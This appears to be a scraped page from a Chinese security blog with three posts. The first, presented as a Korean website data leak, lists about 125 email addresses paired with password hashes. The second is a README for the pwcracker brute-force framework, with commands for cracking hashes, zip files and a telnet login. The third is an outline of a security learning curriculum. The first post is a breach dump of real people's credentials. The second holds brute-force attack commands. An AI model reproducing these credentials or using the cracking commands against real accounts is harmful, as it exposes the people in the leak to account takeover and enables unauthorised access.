*DE651DF50D1DDE1B695AABECF780803DF05E7BA6
nzz@naver.com

*2782490336F4FCE05EC7071E947922CAC6A0AF51
z15150@daum.net

*FE145F3A2CCA7ABD99C55178F37AE6D4EBC0CA95
mul_mang@nate.com

*18B8DD798A0A8B6AAAA5B61BF60AB97CC6A227D4
cogle_@naver.com
08203235997899

*7036AA43D5150826B143E704334B1230E6BBCA90
asqw10000@naver.com

*EC6FDF3C89B91274B5ECB75E48B8B64801205D64
kt10004sm@naver.com

*A8B202A536688E4F6DD995FC1B1939F0A63CF99B
2416727@naver.com

*B0B2FE211ACE141EF6896837BC6903C304264DB4
kt-_mr@nate.com

*5756BE04A85F94232603799176962DA3B4C2BA2C
ma_bel_@naver.com

*DF06A42A5FDFF818B934BEE3F8E30F0F3C4DD6BB
rhatmxk02@naver.com

*31EC1CC92BD1C284148A43DD8AB82A117DF77D44
neo_1_sniper@naver.com

*DC9F941097288AE4D95D0948A67EECB78CAD9F12
gogo9973@aim.com

*F8FC1B7972AEB05ED8F0248088E5DD60B776B489
s_char@naver.com

*BF58B02E7C797C5F294102B5CD4187A0BC997F25
oms44444@naver.com

*B89258450FD4E8A53C6D30F596F83942EBCD0004
parkchs00@naver.com

*522391BC7E91F6B445661B646127F763E66E70CE
gg5803@naver.com

*F846B31F10DD4389C384272E70B9BBA3AD9E1F94
lust_caution@hotmail.com

*ECFA6B4FE2FCB93DF2B85D0ACDF30BF481B528C8
wldn415@naver.com

*3CE83CF4F8D3C90190D2E1CD9C83FA9A4D851C37
nuts_tr@naver.com

*B9B196F3A510896DBE4D7C5A88C0C7F649B05362
ldh2521@nate.com

*8C8587A8E447237EC6B474AF5E5DA559287E20F3
90woghdl@naver.com

*51D0E89B59C6480A267B9CEC5BF59E445626C3DC
ckzksdnjsQkd@nate.com

*A92D5477F491F57E7D5BF1C4D35D7631A2E1572F
xmanwin@hanmanil.net

*763A04221384EEDEEE693117417E0D109E3C6394
corrina@daum.net

*65A3B2B3F355AF57811A2F41C15E69A3CB7D3E0E
actorksh@nate.com

*CEE56906FC0B1621C567D5C9437BC65749234B42
k33man@gmail.com

*8F5F7BAA0B0A95F07ACF06EAC74F8863564DC19C
jch800515@naver.com

*5893793E9B6AA047CF868A13F437BE74ACCCAC70
o_oconfi@naver.com

*B11A37D34204DDBE2A1445D70BD6A812F3FF85B5
aw4t4t@naver.com

*1C07D49851B99958F6FB9E2B8C2EAC956D6E03BE
kitty12544@nate.com

*93514E75C7362E420E00EF877315C18D3CABD472
a11b22c33@hotmail.co.kr

*CD0D2D9DB3E168BE418DB79AC1FBF7FD23AE9FBF
ssslll@gmail.com

*AEAB49381B1CCAEFC1F1611D213EEFEA377C7990
secsd@nate.com

*D610A04681B00D575EAB0AC6D7E86CA2BC1479E7
pootout@naver.com

*502616D9AC7F0579804B05B4732C276127F9F567
asdf5404@naver.com

*1FD70404330BD2736D43776B0D128ECD71C0D124
kinghyg@naver.com
08203236197935

*5DC97D739F51A6C90269BAF4814ADAEF9E96B3FB
xogusms311@naver.com

*5872C86792D1BDD7B44AC0BB47BB81BF8F0AD9C7
pok_00700@nate.com

*204C8A3B79DC1533866049F6819865291C5E6AD5
sdasd@asda.sadsad

*CF14A1370861D4F683DC35BF6002C8B1D0312745
tmvlflt3311@hanmail.net

*AF0EE8630600581D14F04D91DC4BE7D97FA76982
kr3808@naver.com

*07BED2B1624B463BBDA31286EA97AE3A7B5B0B8B
admin@manateeshome.com

*D884FD8980074C3FB103B8D112476BF5047F085F
zxcv@live.co.kr

*6F1CAEDD11A48AE1D557EF485F332E484A7B793D
o___oooo@naver.com

*1F146F1736044DDCEE5D57C83E4425873FFE5518
skahffk@naver.com

*705AE34508657C3AB6E37233C69B1BAC6FE5CDBC
sjh4862@nate.com

*1AB4A0CC66CB4F02544B8DF5B11D28961B865471
s0oyeon@naver.com

*B0727B261B7A98B85CA5E206E8B0E9533EA59F05
fbnobox_

*77998775682C2AE37EC722F2EA45B48D835B75A3
asdsaddsa@naver.com

*52FA97077DDA991BC061903F946C51D088E18278
happyl1gm@gmail.com

*ED0C71D49B254B3FEB4C3FE03482E9AFE98D1690
juhyun1011@naver.com

*22AFFE193D235E1AB76313F8E627C604DCB3968C
intor1984@hanmail.net

*E087ABE78EF7D376BC3ABF163FC2AC04C7AC040C
shinbzzang@naver.com

*BD725C2DA06515841AA569001057A6BBEF4E7C2A
zinizzang@nate.com

*B9583F0F9236556743BEB552A2F7A815FE0BCF3E
room2825@hotmail.com

*A4B6157319038724E3560894F7F932C8886EBFCF
honghal@nanoit.co.kr

*00AD1E91658D70FB7892BEA6C7274BC4D8CBE08F
mousesee@naver.com

*BBCF7FDDE5351E14A54CEC4BBE727D58E84AB20C
minkyoo1120@cyworld.com

*7D4B4D426D43FF5C5CB0D13E2C292F14471D0F6E
3558981@naver.com

*32EDCE23CDDF73118967FB1DF0009F4B122BFCFD
est1893@naver.com

*CD742652478C3BC4D0018976668DB30743C1F7C6
shade718@nate.com

*2DBAB03048EC1EB9FE1BB5395C0C5564EC975FAD
kimbora0329@naver.com

*B27EFF0595B02D90737B1EDA3BDAD0F52CD03074
mgl22@nate.com

*CCD07A65490B7CF0831528AAC1B0FC0B45F85265
jinking

*942A6E462C2217A16EC00F23365A2766158E956C
jins7142@naver.com

*673BD59894D5A5EBD86C6FDA2A9F8A968C101AA6
wl0612@naver.com

*AC3F53438F2B3ABF2FB78A3B9CD43486D80B1393
kcaii@hotmail.com

*A5BF80B01A424D755BB3D357FBF882C08D731661
572nt@hanmail.net

*C6BD4E90F6857E263E4C1CDDA719CE9489D8BC89
rydbr90@naver.com

*FD8C8291B2CF3A0A53478702E80AF1D2ABEB85E5
eastsoft@naver.com

*4AA141AC87740942B6F5D690E0FBB762D9912D54
jini83i@naver.com

*B0F83C9B63242ABD73B68A0851DE95C760F2B682
wwwsj1234@nate.com

*3FF2CEBF12673AEDDA29E43D5C024F1DD474697F
pixadm@naver.com

*B087A896A48EB6C7A0753B84CD322D69C9AC1852
index_html_s@naver.com

*DE4FE6B91EE7F687EF88348CFDA19C2390A65EF4
2toptm@hanmail.net

*AF78C639982CAC92702D553291BF994F771188CA
tmvlem0475@nate.com

*0BD786361C4ED489CB60AECF73ACACAD7B6CA8AE
sdk@naver.com

*59D5D2DA64EA6AEC6947DC6D24EA395A856540AB
ban838@naver.com

*A1AEB3130904E0D5D286E604074871DA78F81A34
goyou2k@naver.com

*48B2552DA14CFA67C637C5BBCE402F45DB5BB49E
gywls1406@naver.com

*AB031C5DD88B5F3CE3F35B5AAF59D6733D797EE2
qwqw9807@naver.com

*016C3CE415AFFD57D0D4EE1699518A3C97429199
esse147852@hotmail.com

*9F8A753FA56741086FBDFFB8770534B0AEEE5B86
too0311@nate.com

*E80EDD404360C84614027AC3208508FEF25C270D
itslux@nate.com

*A932DC6EAD2CE3EA6E5739909A893998540DF3B6
guan1004@nate.com

*0D2DF88EC59FC5C87F221725D8AD09FE8806AD6F
fmura@naver.com

*91CFB743DA1F177EB7D2AFE1F251492892C3DCF6
rfwfwf@fwfw.com

*8039ACA2C2D7EA6BB03AE70D5A7435470A653DAF
brother27@daum.net

*2B04349EAEBB76BCDA3BA91C10838A9F570CD5D1
omj0630@naver.com

*C911ECDEA5B8B44A6881F20BEC73AA073C8837DE
fmura@naver.com

*8052674CE15C8F0FADC070C86988692EC55AAB83
dudwn4095@naver.com
08203236197942

*3BE71DB8E8C844D5917882D1BB2B140FE2AB5913
hk6563@

*4A49B7B9C92E19E44A24A9376A07E113C71AE35C
lkh7425@naver.com

*4F38DFFE45995C4158937E8E2C59570BD1EB2C0D


*204C8A3B79DC1533866049F6819865291C5E6AD5
qksrbwls123@naver.com

*0900CDEB74852BA3959172F0BC3D5436D9D77DEB
gkstj7276@naver.com

*85FEDFD7BD5B48B58EA701857580E819D974F5E1
khy1790@nate.com

*84826921445ADB4716A8C7DB5B6A8DE88EBDDD23
우어

*7BB6DCC592B1133598043E8FC3BDBD03F6A91E1C
shxorud@naver.com

*6566B4755C026FD35C673255FBDF5292719C293E
cutesh1112@naver.com

*20B2343FCFBC72F9004066049CF9940DDE8AB9EC
rlaeogh0070@yahoo.com

*050376F3855A67F5E2C6514FD3130B31006C1276
0617515344@hanmail.net

*40ACA027926D63F0182704C2F7A3497E7A40F7AC
4260soo@hanmail.net

*31CE11FD2AAEED0E086E1028DDD366DDE89179E6
ckzksdnjsQkd@nate.com

*72A5DB669F893DBAE7465F327F3C196B8F577104
yh_0832@naver.com

*D5C57687D75C1E23F8ACB591EBBBFBB5E8AF51E6
jongil6964@naver.com

*20C20564C154FB7527842F444FED0778B1ECC336
wjswolas07@naver.com

*D7C0E7B95EFF6A95135EE0EDAB761B3F695C1A45
sh.vicky@gmail.com

*137EAB41B2BAA795095C50046AA7487ACB550A6E
microsoft___@nate.com

*7368DD94E68A60C4C800C31A54DFA32279045354
choi_coach@naver.com

*ABD7577C2BA025DA9045D5F43E6377416356A471
cheol244@naver.com

*21005C1C56C4575270B498699464E278C5FF63AD
hongs@naver.com

*EEB7026075A751D228DD9AF92EDCC5FD64C1C922
skhhn@naver.com

*3BEA63C1AA13D550A0AF1F8B1BE0DAF25B4A9CC3
charlize21@naver.com

*89F8C09BBAE121EA96F7C7CEFC0B53B99F9B0D01
max0015@naver.com

*7D5FCC7D539A7FF53AB76C165376B3B4034C8560
iglayi@naver.com

*158E70F379CC4F7AC83D5B2D616A75F9CF739E96
mcmanura@nate.com

*5FA68751E76751230A6E12AE0C7992597809FD77
chick_@nate.com

*F92FD568BF0ECCCD2DB61E37CBEAE0961F928E43
home9837@daum.net

*DD9CEEEA3E2B6FC6F143CF4AEA021AAC2B99E774
soullhk@naver.com

*F4AA7EA6E008A943EF5AA8E1341828F3FF9748C2
tstop1120@naver.com

*AF4609B490525CD09A191C32CD7ED734B2CC0188
kiic83@naver.com

*14BD97EBF9615D63D9488EE43E41E49719BB6411
ksb9793@naver.com

*396A504C321E4049AD1E2D859DC705C268A678B6
ckzksdnjsQkd@nate.com

*CAE568CF47DE30465522847122C17BBFD580BBF4
mania-kang@hotmail.com

*8FD78DA940A6CE370CFF0C12B9F61C402E4E0E76
rladudrn0978@naver.com

The post 韩国网站数据泄露 用户名user 邮箱mail 密码pw appeared first on 🔰雨苁ℒ🔰.

rar密码破解 zip密码破解 压缩包密码破解

rar密码破解 zip密码破解 压缩包密码破解 387个暗网网址

pwcracker：一款插件化密码爆破框架

密码破解脚本调用框架，目前支持密文，文件，服务和应用等类型的20种密码破解。

一、简介

该项目主要解决以下问题

目前工具的优势和缺陷，请各位根据其特点。自行选择在那种场景下使用。

二、快速使用

2.1 安装

git clone https://github.com/c0ny1/pwcracker
pip install -r requirement.txt
python pwcracker.py

2.2 参数列表

$ python pwcracker.py -h
usage: pwcracker.py [options]

* An expandable password cracking framework. *
By c0ny1 (http://gv7.me)

optional arguments:
  -h, --help            show this help message and exit

CRACK:
  -t TARGET             The target to crack,target format:protocol://path:port
  -T FILE               Load the target file to be cracked.
  -u USERNAME, --username USERNAME
                        The user name to crack.
  -U FILE               The user name dictionary file to load.
  -p PASSWORD, --password PASSWORD
                        Passwords to crack.
  -P FILE               Load the password dictionary file to be cracked.
  -r THREADS            Num of scan threads for each scan process, 3 by default

SHOW:
  -s, --show            Show all plugins
  -i PLUGIN_NAME, --info PLUGIN_NAME
                        Show one plugins
  -v                    Show the details of the cracking password.
  -V, --version         show program's version number and exit

2.3 Example：

(1)爆破md5

python pwcracker.py -t md5:// -P D://password.txt

(2)爆破zip文件

python pwcracker.py -t zip://d://test.zip -U D://username.txt -P D://password.txt

(3)爆破telnet

python pwcracker.py -t telnet://192.168.1.108:23 -U D://username.txt -P D://password.txt

三、插件列表

四、插件编写

4.1 插件模板：

#coding=utf-8

def plu_info():
	dict_plugin={};
	dict_plugin['name']="md5" # 插件名称
	dict_plugin['author']="c0ny1<root@gv7.me>" # 作者
	dict_plugin['date'] = "2018-09-24 18:23" # 最后更新时间
	dict_plugin['description'] = "Used to crack MD5 ciphertext." # 描述
	dict_plugin["usage"] = "python pwcracker.py -t test://127.0.0.1 -u root -p root" # 使用例子
	return dict_plugin

def doCheck(address,username_list,password_list):
	pass

def doCracker(address,username,password):
	pass

4.2 说明

1. plu_info（）函数用于返回插件的一些信息，当执行python pwcracker.py --info plugin_name,会在控制台显示插件的信息。

2. doCheck(address,username_list,password_list)函数是在爆破前对爆破的目标，字典列表，密码列表进行检查。如果检查合格则返回True,就可以进行爆破了。若果检查是存在问题，则返回False，框架就会终止运行并提示不合法的数据位置。

3. doCrack(address,username,password)函数是必须要实现的。传入的参数分别是爆破的目标，用户名和密码。我们需要在函数体内实现爆破的核心功能。爆破成功，则return True,msg,失败则return False,msg。这里msg是成功或者失败附带的信息，没有的话可以设置为None。

注意:

1. plu_info()和doCheck(address,username_list,password_list)为可选实现，doCrack(address,username,password)必须实现！
2. 具体例子可以参数项目plus下的插件。

4.3 API

框架提供的API

五、参考项目

• POC-T
• patator
  from

The post rar密码破解 zip密码破解 压缩包密码破解 pwcracker appeared first on 🔰雨苁ℒ🔰.

• • 知道创宇研发技能表v3.1离线版打包下载 
• 通用技能
  • 公司与个人
    • 公司是盈利性组织
    • 个人和公司必须双赢
    • 在认同公司理念且能够给公司创造足够价值的基础上，为个人发展而工作
  • WHO AM I
    • 黑客是守正出奇且具备创造力的群体
      • 守正出奇
        • 这条正道/底线得坚守
        • 但如果太过正就迂腐了，为了搞定任务有时得出奇招
      • 创造力
        • 一个没有创造力的人是多么的可怜，对于团队来说也是一种耻辱
        • 本技能表的本质目的只有一个：引导你拥有足够的创造力
    • 黑客也可以是一种思维方式
    • 我们需要对得起名片上的那个头衔：工程师、研究员
    • 牛人姿态
      • 即使现在不是牛人，也得具备这样的姿态
      • 没有一定扎实内功与远见的人很少有这样的姿态
      • 拥有不将就的做事风格，迟早是牛人
  • 如何做事
    • 方法论
      • 完成一件事有好几条途径，优秀的人的途径最短
      • 任务拆分很容易得出做事的方法论
      • 好的「方法论」会让你具备更强的「创造力」！
        • 时刻问自己：「是否具备创造力？」
    • 任务拆分
      • 成长过程会经历：能力越大、责任越大、事情越多
      • 思路
        • 拆分细化为多个点
        • 排好优先级
          • 任务四象限，决定优先级
            • 紧急重要
              • 赶紧搞定
            • 重要不紧急
              • 时刻保持关注，以免沦为「紧急重要」
            • 紧急不重要
              • 少少益善，学会拒绝
            • 不紧急不重要
              • 靠自律
        • SMART原则
          • S：任务是否明确
            • 不明确的任务搞起来就是浪费生命
          • M：任务是否可度量
            • 不可度量如何体现价值？
          • A：任务是否可搞定
            • 搞不定就不应该接，接就得有魄力搞定
          • R：任务的相关性如何
            • 决定了任务的价值，相关性越高越能体现价值，比如这个任务搞定了能让团队获得公司、客户等更大的认可
          • T：任务的时间
            • Timeline：任务时间轴，什么时间点需要搞定什么
            • Deadline：任务的最后期限，做评估时最好提前，因为总会有各种意外或拖延本性
            • Timeline上一些很关键的时间点我们可以称为里程碑，搞定每个里程碑应该庆祝下
        • 自己欠缺什么，立马发现
        • 是否需要寻求帮助，谁能帮你，自己单干？

        • 团队
          • 士气第一
          • 当你有团队时，分配与调度好任务很关键
            • 做得好是真并发
            • 做不好会死锁
    • 沟通、反馈与责任
      • 一个无沟通能力的人，要么是天才，要么是不可爱的人，不过天才也就寥寥无几而已，你并不是
      • 反馈要及时
        • 避免出问题不反馈，影响进度
        • 方式
          • 正式的：邮件
          • 临时的：微信等即时通信
          • 着急的：给个电话
      • 工作有大小，责任心无大小
      • 周报的透明
        • 意义：大家互相了解工作与心得，有利于自己的判断与成长
          • 观察是一种多重要的技能
          • 不是单纯的给领导汇报工作
        • 周报需体现本周工作总结、下周工作计划、心得/问题/建议（我们叫唧唧歪歪）
        • 周报可以很好体现一个人的
          • 总结能力
          • 计划能力
          • 分享能力
            • 想象下：一个人从来没有心得/问题/建议的沉淀或反馈，这个人是一个相对封闭的人，在团队作战中很难达到默契
            • 当然，这种分享能力远不仅仅是在周报这种形式里
    • 团队意识
      • 很多人都说自己具备足够好的团队意识，但是有些人却并不是这样
        • 举个小例子：一个10人团队约定早上10点开会，而你迟到了10分钟，对于团队来说你浪费了整个团队100分钟（10人*10分钟）的生命。有些人无羞愧之心要么是意识不到这点，要么这个团队的风气就是这样…
      • 团队意识是建立在互相信任的基础上
      • Leader最关键，优秀的Leader一定会有个优秀团队
        • 兵熊熊一个
        • 将熊熊一窝
      • 如何拥有个优秀的团队是一个复杂的话题
  • 成长
    • 新事物的敏感性
      • 保持好奇心
      • 不要局限在自己的圈子，适当跨界吸收灵感
      • 订阅国内外优秀博客/资源，Inoreader/深蓝阅读不错
      • 选择性参与一些必要的会议，听必要的主题，讨论必要的话题
    • 关于知识
      • 对知识的渴望程度决定了前进动力的大小
      • 当知识很廉价地摆在你面前，你反而不会珍惜
      • 对知识保持敬畏之心
    • 不要让自己成为矫情/浮夸的人
    • 和比你厉害的人在一起，和一流的人工作
      • 指点往往是精华
      • 杜绝笨蛋爆炸
        • 二流的人招进来的人不太可能是一流的
        • 久而久之一个团队就笨蛋爆炸了
    • 思考
      • 批判性思考
      • 换位思考
        • 对于一个团队来说，这点太关键
    • 提问的智慧
      • 遇到问题先独立思考，尝试独立解决，尽最大努力后再提问
      • 提问时，礼貌很关键（对知识的敬畏），清晰表达很关键
      • 解决后，分享出来帮助更多需要帮助的人
    • 小事心态
      • 越基础的事越关键，越需要细心
      • 不要一味盲目追求「高级感」，而忽视「小事」/「简单事」/「基础事」
      • 基础不牢、地动山摇
      • 小事做不好，别提大事
    • 无论是个人还是团队的成长都需要不断沉淀知识，没有沉淀根基不稳
  • 完成的定义
    • 比如写个PoC
      • 1. 搞懂了目标Web应用漏洞的原理
      • 2. 熟练运用Python各相关模块与机制
      • 3. 熟练了解了HTTP协议
        • HTTP请求
        • HTTP响应
      • 4. 代码写得够规范，让人看起来就是爽
      • 5. 程序经过足够的测试
        • 黑测试
        • 白测试
      • 6. 及时反馈进度
        • 我遇到困难了
        • 我搞定了
      • 7. 更新相关文档，沉淀
  • 熟练的定义
    • 比如熟练SQL注入
      • SQL语句这门“语言”能脱离文档顺手写出
      • 主流数据库的SQL特有函数、存储过程、机制我都了如指掌
        • MySQL
        • MSSQL
        • Oracle
        • PostgreSQL
        • Access
        • SQLite
        • …
      • 牛逼的工具我不仅用的顺其自然，源码还读过几遍，我能修改
        • sqlmap
        • …
      • 我具备创造性，而不仅仅是跟在大牛身后
        • 研究出了几个不错的技巧
        • 发了几篇不错的Paper
        • 对外会议/沙龙等进行了几次分享
        • 写出了自己的相关工具，爽
      • 我实战了N回，遇到了很多奇葩环境，我有足够的信心绕过
      • 以上这些之后，这才叫熟练！其他同理
  • 好书推荐
    • 推荐理由
      • 打通任督二脉的书，怎能不看？
        • 但，尽信书不如无书
      • 任何科学研究最终必须至少到哲学层面，触碰到上帝的脚
      • 具体技术类书籍请见「专业技能」相关部分
    • 鸡汤类
      • 黑客与画家
        • 印象深刻：设计者的品味
          • 好设计是简单的设计
            • 抓住本质
          • 好设计是永不过时的设计
            • 如果解决方法是丑陋的，那就肯定还有更好的解决方法，只是还没有发现而已
          • 好设计是解决主要问题的设计
          • 好设计是启发性的设计
          • 好设计通常是有点趣味性的设计
          • 好设计是艰苦的设计
          • 好设计是看似容易的设计
          • 好设计是对称的设计
          • 好设计是模仿大自然的设计
          • 好设计是一种再设计
          • 好设计是能够复制的设计
          • 好设计往往是奇特的设计
          • 好设计是成批出现的
          • 好设计常常是大胆的设计
      • 浪潮之巅
        • 感受IT帝国的崛起与没落，我们现在站在又一个互联网浪潮之巅
    • 洁癖类
      • 重构
      • 代码整洁之道
      • 代码大全2
    • 敏捷类
      • Rework中文版
        • 37signals团队的敏捷经验
      • 高效程序员的45个习惯
    • 产品类
      • 人人都是产品经理
      • 结网
    • 神书
      • 自私的基因
      • 失控
    • …
• 专业技能
  • 原则
    • 至少完整看完与练习好一本书
    • 至少过一遍官方文档
  • 基础必备
    • HTTP抓包与调试
      • Firefox插件
        • Firebug
          • 抓包与各种调试
        • Tamper Data
          • 拦截修改
        • Live Http Header
          • 重放功能
        • Hackbar
          • 编码解码/POST提交
        • Modify Headers
          • 修改头部
      • Fiddler
        • 浏览器代理神器
        • 拦截请求或响应
        • 抓包
        • 重放
        • 模拟请求
        • 编码解码
        • 第三方扩展
          • Watcher
            • Web前端安全的自动审计工具
      • Wireshark
        • 各种强大的过滤器语法
      • Tcpdump
        • 命令行的类Wireshark抓包神器
      • Python
        • urllib2
          • 打开请求响应调试
            • 编辑urllib2的do_open里的h.set_debuglevel
            • 改为h.set_debuglevel(1)，这时可以清晰看到请求响应数据，包括https
    • 什么是跳转
      • 服务端跳转
        • 302
          • <?php header(“Location: 3.php”); ?>
        • 301
          • <?php header(“HTTP/1.1 301 Moved Permanently”); header(“Location: 2.php”); ?>
        • u=urllib2.urlopen(url)后，u.url能得到服务端跳转后的地址
          • urllib2自己的特性
          • 所谓的会跟进去
      • 客户端跳转
        • <meta http-equiv=”refresh” content=”0; url=http://www.evilcos.me” />
          • htmlparse解析就行了
        • location.href=”http:/” + “/evilcos.me”;
          • 正则解析（弱）
          • JavaScript引擎解析（强）
    • Office能力
      • Word文档编写，看去要专业，尤其对外的
      • Excel里面大量的统计、图表功能，需要善于使用
      • PPT演讲、培训等必备，如何做好PPT？百度一下…
      • 进一步
        • yEd
        • Visio
        • FreeMind
          • 本技能表就是这个制作
    • 上手Linux
      • 《鸟哥的Linux私房菜》
    • 熟练VIM
      • 实战至少3回合：http://coolshell.cn/articles/5426.html 
    • 上手Python
      • https://www.python.org/dev/peps/pep-0008/ 
      • http://learnpythonthehardway.org/book/ 
      • 《Python核心编程2》
        • 第4章 Python对象
          • 完整熟练
        • 6.8 Unicode
          • 完整熟练
        • 8.11 迭代器和iter()函数
          • 完整熟练
        • 第9章 文件的输入和输出
          • 完整熟练
        • 第10章 错误和异常
          • 完整熟练
        • 第11章 函数和函数式编程
          • 完整熟练
        • 第12章 模块
          • 完整熟练
        • 第14章 执行环境
          • 完整熟练
        • 第15章 正则表达式
          • 完整熟练
        • 第18章 多线程编程
          • 完整熟练
        • 20.2 使用Python进行Web应用：创建一个简单的Web客户端
          • 完整熟练
    • 算法
      • 快排
      • 二分
    • 正则表达式
      • 调试工具
        • Kodos
        • RegexBuddy
          • 支持多种语言
          • 支持调试优化
        • http://www.regexper.com/ 
          • 正则图解
      • 正则表达式30分钟入门教程：http://deerchao.net/tutorials/regex/regex.htm 
      • http://wiki.ubuntu.org.cn/Python正则表达式操作指南 
      • 《精通正则表达式》
    • 研发能力
      • 瀑布模型
        • 需求->需求分析->设计->开发->测试->上线->运维/运营
      • 需求分析能力
        • 给你一个需求，如何给出一个优美的执行思路——方法论
        • 这个能力非常非常非常的关键
      • 调试能力
        • 只要定位出，就没有解决不了的Bugs
        • 肉眼看到的都是假象
          • 一定要专业的工具与经验配合
        • Bugs在哪出现，最终就在哪进行真实模拟调试
        • 缩小范围
          • 构建自己的测试样例
            • 排除网络复杂未知情况
          • 关联模块一个个排除
          • Python单步调试
            • import pdb;pdb.set_trace()
            • 在需要单步调试的地方加上面这句，运行程序后中断在此，然后h查看指令进行一步步细细调试
          • 粗暴调试：print
      • 敏捷思想
        • 快速迭代
        • 任务拆细
        • v1原则：定义好v1的目标，快速完成v1为优先
        • 习惯Wiki记录，利于沉淀与分享
    • 翻墙
      • 优雅解决方案
        • shadowsocks + 一台海外 VPS + Chrome(SwitchyOmega)/Firefox(AutoProxy)
        • 详情了解：http://mp.weixin.qq.com/s?__biz=MzA3NTEzMTUwNA==&mid=210457700&idx=1&sn=322d1e4c13d3f33ade848e3889c410bf#rd 
      • SSH隧道
        • http://www.ibm.com/developerworks/cn/linux/l-cn-sshforward/index.html 
        • 本地转发
          • ssh -L <local port>:<remote host>:<remote port> <SSH hostname>
        • 远程转发
          • 反弹
          • ssh -R <local port>:<remote host>:<remote port> <SSH hostname>
        • 动态转发
          • ssh -D <local port> <SSH Server>
  • Web安全
    • 零基础如何学习Web安全
      • http://www.zhihu.com/question/21606800/answer/22268855 
    • Web服务组件
      • 8+1：一图胜千言哎:) 
      • 钟馗之眼
        • 网络空间搜索引擎
        • http://zoomeye.org 
        • 大量样例：http://www.zoomeye.org/search/dork 
      • 组件具有影响面，越底层的组件影响面可能越大
    • 安全维度
      • 漏洞
      • 风险
      • 事件
    • Web安全标准
      • OWASP
      • WASC
    • 实战环境
      • XSS
        • 内部平台：ks-xsslab_open
          • 可以上手
            • XSS
            • CSRF
            • ClickJacking
        • http://xss-quiz.int21h.jp/ 
          • 答案：xss_quiz.txt 
        • http://prompt.ml/0 
          • 答案：https://github.com/cure53/XSSChallengeWiki/wiki/prompt.ml 
        • http://escape.alf.nu/ 
          • 答案：http://blog.nsfocus.net/alert1-to-win-write-up/ 
      • SQL
        • https://github.com/Audi-1/sqli-labs 
          • SQLI-LABS is a platform to learn SQLI
      • i春秋
        • http://www.ichunqiu.com/ 
      • Seebug + ZoomEye
        • http://seebug.org 
        • http://zoomeye.org 
        • 你懂得…
    • 工具
      • 我的渗透利器
        • Firefox
          • Firebug
            • 调试JavaScript，HTTP请求响应观察，Cookie，DOM树观察等
          • Tamper Data
            • 拦截修改
          • Live Http Header
            • 重放功能
          • Hackbar
            • 编码解码/POST提交
          • Modify Headers
            • 修改头部
          • GreaseMonkey
            • Original Cookie Injector for Greasemonkey 
          • NoScript
            • 进行一些JavaScript的阻断
          • AutoProxy
            • 翻墙必备
        • Chrome
          • F12
            • 打开开发者工具，功能==Firebug+本地存储观察等
          • SwichySharp
            • 翻墙必备
          • CookieHacker
            • http://evilcos.me/?p=366 
        • Web2.0 Hacking
          • XSS’OR
            • 常用其中加解密与代码生成
            • http://evilcos.me/lab/xssor/ 
            • 源码：https://github.com/evilcos/xssor 
          • XSSEE 3.0 Beta
            • Monyer开发的，加解密最好用神器
            • http://evilcos.me/lab/xssee/ 
          • Online JavaScript beautifier
            • JavaScript美化工具，分析JavaScript常用
            • http://jsbeautifier.org/ 
          • BeEF
            • The Browser Exploitation Framework
            • http://beefproject.com/ 
        • HTTP代理
          • Fiddler
            • 非常经典好用的Web调试代理工具
          • Burp Suite
            • 神器，不仅HTTP代理，还有爬虫、漏洞扫描、渗透、爆破等功能
          • mitmproxy
            • Python写的，基于这个框架写神器实在太方便了
        • 漏洞扫描
          • AWVS
            • 不仅漏扫方便，自带的一些小工具也好用
          • Nmap
            • 绝对不仅仅是端口扫描！几百个脚本
          • Python自写脚本/工具
        • 漏洞利用
          • sqlmap
            • SQL注入利用最牛神器，没有之一
          • Metasploit
            • 最经典的渗透框架
          • Hydra
            • 爆破必备
        • 抓包工具
          • Wireshark
            • 抓包必备
          • Tcpdump
            • Linux下命令行抓包，结果可以给Wireshark分析
        • Seebug + ZoomEye
          • 类似这类平台都是我们需要的
          • Seebug类似的
            • https://www.exploit-db.com/
          • ZoomEye类似的
            • https://www.shodan.io/
      • Kali Linux
        • 除了上面介绍的一些工具，其他海量各类型黑客工具，自己去摸索
    • 书
      • 《黑客攻防技术宝典（Web实战篇）》
      • 《白帽子讲Web安全》
      • 《Web前端黑客技术揭秘》
        • 我和xisigr出品
      • 《Web之困》
      • 《SQL注入攻击与防御》
    • papers
      • http://www.exploit-db.com/papers/ 
      • BlackHat/Defcon/XCon/KCon/国内各安全沙龙等相关Papers需要持续跟进
  • 嵌入式安全
    • 路由器安全
      • 基础
        • 嵌入式Linux系统方面知识
        • 开放系统互联参考模型-第三层网络层
        • MIPS/ARM汇编知识
        • VxWorks系统方面知识
        • JTAG调试接口规范
        • 嵌入式系统交叉环境开发
        • 路由器芯片方案提供商
          • 博通
          • Atheros
          • TrendChip
          • ACROSPEED
          • IC+
          • 瑞昱
          • …
      • 站点
        • https://www.openwrt.org/ 
          • OpenWrt is described as a Linux distribution for embedded devices
        • http://routerpwn.com 
          • 全球主流路由器相关漏洞大集合
        • http://see.sl088.com/wiki/Uboot_%E7%BC%96%E8%AF%91 
          • Uboot_编译
        • http://www.devttys0.com/ 
          • Embedded Device Hacking
      • 工具
        • Binwalk
        • IDA Pro
        • gdb/gdbserver
        • qemu-system
        • qemu-user-static
        • Smiasm
        • Metasm
        • JTAG硬件调试器
      • 书
        • 《揭秘家用路由器0day漏洞挖掘技术》
        • 《Hacking the XBOX: An Introduction to Reverse Engineering》
        • 《Hacking the Cable Modem: What Cable Companies Don’t Want You to Know》
        • 《MIPS体系结构透视 》
        • 《计算机组成与设计：硬件、软件接口》
    • 摄像头安全
      • http://www.openipcam.com/ 
      • https://media.blackhat.com/us-13/US-13-Heffner-Exploiting-Network-Surveillance-Cameras-Like-A-Hollywood-Hacker-Slides.pdf 
    • 工控安全
      • 基础
        • 工业生产环境的基本结构，如：SCADA、PCS
        • 工业生产环境的信息安全风险点（可参考DHS出版物）
          • Improving Industrial Control Systems Cybersecurity with Defense-In-Depth Strategies
        • 工控网络组态、逻辑开发、应用组态的基本技术方法
        • 抓包、看RFC分析几个常规工业以太网协议，如：Profinet、Modbus
        • 买两款PLC玩玩，会真实感受到工业环境的信息安全问题（一定记得买以太网模块，不贵二手几百块）
      • 站点
        • 事件跟踪分析
          • http://plcscan.org/blog/ 
          • http://scadastrangelove.blogspot.kr 
          • http://www.phdays.com/ 
          • http://www.scadasl.org 
          • https://scadahacker.com 
            • Duqu
              • https://scadahacker.com/resources/duqu.html 
            • Stuxnet
              • https://scadahacker.com/resources/stuxnet.html 
            • Havex
              • https://scadahacker.com/resources/havex.html 
        • 标准协会/测试工具
          • DHS CET套件
            • http://ics-cert.us-cert.gov/Assessments 
          • NERC ES-ISAC
            • http://www.esisac.com/SitePages/Home.aspx 
          • ICS-ISAC
